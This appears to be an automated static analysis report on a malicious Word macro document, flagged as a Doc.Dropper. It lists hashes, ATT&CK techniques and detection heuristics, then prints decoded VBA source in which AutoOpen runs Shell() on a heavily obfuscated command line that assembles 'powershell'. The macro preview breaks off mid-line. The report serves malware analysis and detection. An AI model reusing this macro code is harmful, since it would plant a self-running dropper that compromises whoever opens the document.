Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c3afe5ee4fddaa0c…

MALICIOUS

Office (OLE)

Size: 97.5 KB
Created: 2018-06-06 18:14:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 7c4d734058fe47f4598843a7b805d2ef
SHA-1: b42602c6f1aff09ed475a19ff93393885eacc9aa
SHA-256: c3afe5ee4fddaa0cef8b719e8ae18f1086004c6c42d5b236e2e29b8ce6be09d0
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office (OLE) Word document containing VBA macros. The Autoopen macro calls a helper function that invokes Shell(), a common technique for downloading and executing further malicious payloads; the command line passed to Shell() is assembled from obfuscated string fragments, as seen in the extracted macro source below. The ClamAV detection also confirms its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6575795-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6575795-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13840 bytes
SHA-256: 1d4e19622d005395233c13e3b2f1d02fc00484f5750ccf100b05f93ab1ce34d5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wBwhrzqzUSjYM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function bnlTzrJjnHf()
On Error Resume Next
EjGanR = CStr(nAQLD * Tan(UIdDT * Int(NjdDw * Sqr(59687) / WRaGB + Fix(93776)) / 47850 * Round(47345 / Log(50332 - QqKwA) + 84374 - wcJWP)) / 73307 + CByte(92809))
PYrNbc = CStr(vdutM * Tan(POizuG * Int(MIRNp * Sqr(34205) / TVnHi + Fix(58614)) / 37034 * Round(72604 / Log(46067 - KzZGvh) + 7628 - fRhOf)) / 44843 + CByte(39247))
bnlTzrJjnHf = LLauUw + Shell(vkPwIhhwiPV + Chr(obbVOzV + vbKeyC + VSUXs) + RLHRYPdOiP + bnEOsmiXO + nZYIf + lZkNmsWlmJ + tYjziQ + LQqzQKpMwK + jpDMb, 9444 - 9444)
iaGHiY = CStr(Vqapn * Tan(hadqz * Int(vhHRaN * Sqr(13423) / AZFqQ + Fix(74677)) / 99342 * Round(91857 / Log(85319 - QCmpDQ) + 41022 - QrzqDX)) / 65146 + CByte(66575))
End Function
Sub Autoopen()
On Error Resume Next
zbJfu = CStr(PIvkj * Tan(APmiw * Int(uCFdqv * Sqr(66283) / PMKWhI + Fix(64832)) / 26933 * Round(3964 / Log(38737 - zVfXhI) + 60514 - TPcLHE)) / 95138 + CByte(75939))
bnlTzrJjnHf
TTkNzz = CStr(CwYDb * Tan(mNSzzE * Int(fYVLK * Sqr(28963) / nACRjU + Fix(3268)) / 90077 * Round(66224 / Log(67668 - BXXUi) + 68381 - KccPtH)) / 9644 + CByte(85840))
End Sub


Attribute VB_Name = "AuwZDiQUBw"
Function RLHRYPdOiP()
On Error Resume Next
FWqjah = CStr(vYkDXY * Tan(qJiFiE * Int(iZrEXY * Sqr(16761) / EtdHVw + Fix(60477)) / 4656 * Round(87640 / Log(52186 - WlZLs) + 95242 - frAlE)) / 46402 + CByte(22957))
IBsXHOtijM = "md OAKkh" + "MoUE" + "BbitR " + "UF" + "ZNCwSiucHQi" + "TaqsTcCBS" + "Kqvjc OMmQJDd &" + "    " + " %^c^o^m^" + "S^p^E"
awzbCJ = CStr(wTqZPD * Tan(LGoiK * Int(MFOzHK * Sqr(86734) / zTpFv + Fix(47435)) / 41473 * Round(67518 / Log(5584 - YLfoF) + 39797 - hKdjt)) / 92749 + CByte(49707))
CQfRZdjG = "^c^%    " + " %^c^o^m^S" + "^p^E^c^%" + "     /V    " + "     /c     " + "      " + "set %nFzwwRP"
djViA = CStr(sPZwA * Tan(UUijc * Int(XGwDY * Sqr(98772) / jZAPlE + Fix(44994)) / 29732 * Round(83809 / Log(35469 - AACwfv) + 10863 - FTwNfz)) / 7993 + CByte(80597))
ZQnOU = "HZwKA" + "Lbk%=ZorSmPXH" + "Sqif&&set " + "%idQG" + "cvW" + "jbbL%=p&&set %M" + "jBMuIROS%=o^w"
TPZLW = CStr(UvsAou * Tan(mcCpjb * Int(aaCwj * Sqr(87416) / hMUSjO + Fix(96694)) / 92003 * Round(54414 / Log(86765 - dMiBnv) + 33204 - djWKpQ)) / 55904 + CByte(77655))
VvapdDZAun = "&&set %QV" + "zVQ" + "Pnk" + "tX"
tMbccO = CStr(iYhHji * Tan(AIMCOT * Int(nHjoQ * Sqr(87370) / BiBDZ + Fix(98746)) / 5079 * Round(30717 / Log(34369 - BwvTP) + 26188 - NwqWC)) / 56568 + CByte(27888))
zoazwwaQqi = "jk" + "lLk%=kfQZdaM" + "bRkrYis&&" + "set %USuhH" + "FnGGMPHM" + "O%=!%" + "idQG"
VaGEu = CStr(MUbjtf * Tan(Gfnkr * Int(BQXFY * Sqr(88472) / bRCpz + Fix(2307)) / 75489 * Round(79998 / Log(9102 - wLXNo) + 56354 - mVhGG)) / 38258 + CByte(5827))
zqbfJiwoDj = "cvWjbb" + "L%!&&set %dGjj" + "qEwojvnAsCI%=ha" + "icWmZJ&&set %AF" + "WBFmpHI%=" + "e^r&&set " + "%aPnrB" + "DrikntN" + "l%=!%MjBMu"
KSNzzV = CStr(KXMvSm * Tan(ssNCGr * Int(TzMnD * Sqr(36190) / MQUzz + Fix(6728)) / 78298 * Round(67667 / Log(49632 - HDOAzA) + 87682 - hFdos)) / 8812 + CByte(26318))
NzcmT = "IROS" + "%!&&set %jEb" + "NGnv" + "BH" + "%=s&&" + "se" + "t %CqIYE"
MrUBK = CStr(CfwGsz * Tan(isJSV * Int(CcYTzS * Sqr(54023) / NZXYP + Fix(68679)) / 76430 * Round(82091 / Log(95075 - YhOAj) + 4313 - IvszMU)) / 42323 + CByte(43382))
acMRWB = "jY" + "PCBta" + "BCV%=zwvU" + "ldhKTKDQ&&se" + "t %BIiG" + "OOl%=" + "he&&set " + "%PijtLNcL" + "japj%=ll&&" + "!%USuhH"
KjoXW = CStr(iXoGai * Tan(Oirvtu * Int(jBtWao * Sqr(43992) / WBFBBF + Fix(47761)) / 7984 * Round(4384 / Log(49749 - qzqMdb) + 19463 - hOHRab)) / 65792 + CByte(56435))
MntnFjZPd = "FnGGMPHMO%!!%aP" + "nrB" + "DrikntNl%!!%A" + "FWBFmpHI%!!" + "%jEbNGnvBH%!!%" + "BIiG" + "OOl%!" + "!%PijtLNc" + "Ljapj%! "
qSwiL = CStr(AnAZhW * Tan(apVBEo * Int(pQuQIp * Sqr(40005) / jfZTc + Fix(30656)) / 26386 * Round(69279 / Log(55761 - iA
... (truncated)